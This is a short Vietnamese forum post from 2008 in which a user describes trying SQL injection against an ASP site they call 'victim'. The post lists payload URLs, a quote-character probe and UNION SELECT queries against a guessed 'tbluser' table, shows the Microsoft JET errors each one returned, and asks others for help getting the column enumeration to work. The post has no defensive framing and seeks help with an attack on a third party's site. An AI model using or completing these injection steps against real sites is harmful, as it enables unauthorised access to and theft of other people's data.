[Question] Lỗi sql injection |
18/09/2008 07:31:15 (+0700) | #1 | 151812 |
quanlongit
Member
|
0 |
|
|
Joined: 01/04/2007 01:56:44
Messages: 17
Offline
|
|
http://victim/xxxxx.asp?id=1
Sau khi xem dấu ' vào victim/xxxxx.asp?id=25'
thì nó báo Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'id =25''.
xxxxxxxxxxxxxx line77
Mình đã khai thác nó như sau
http://victim/xxxxx.asp?=25 union select 1 from tbluser
thì nó báo là Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match. (1)
xxxxxxxxxxxxxxx line77
Chúng tỏ tbluser tồn tại
nhưng khi thêm vào http://victim/xxxxx.asp?id=25 union select 1,2 from tbluser
thì nó báo : Microsoft JET Database Engine error '80004005'
Query input must contain at least one table or query.
xxxxxxxxxxxxxxxx line77
Thêm vào 3,4,5,6,7 gì nó cũng báo thế
Nó báo như thế này thì chúng tỏ tbluser là sai nhưng ở trên (1) thì chúng tỏ tbluser này tồn tại ( không biết có đúng hay không)
Giờ cần 1 cao kiến giúp
Thân
|
|
|
|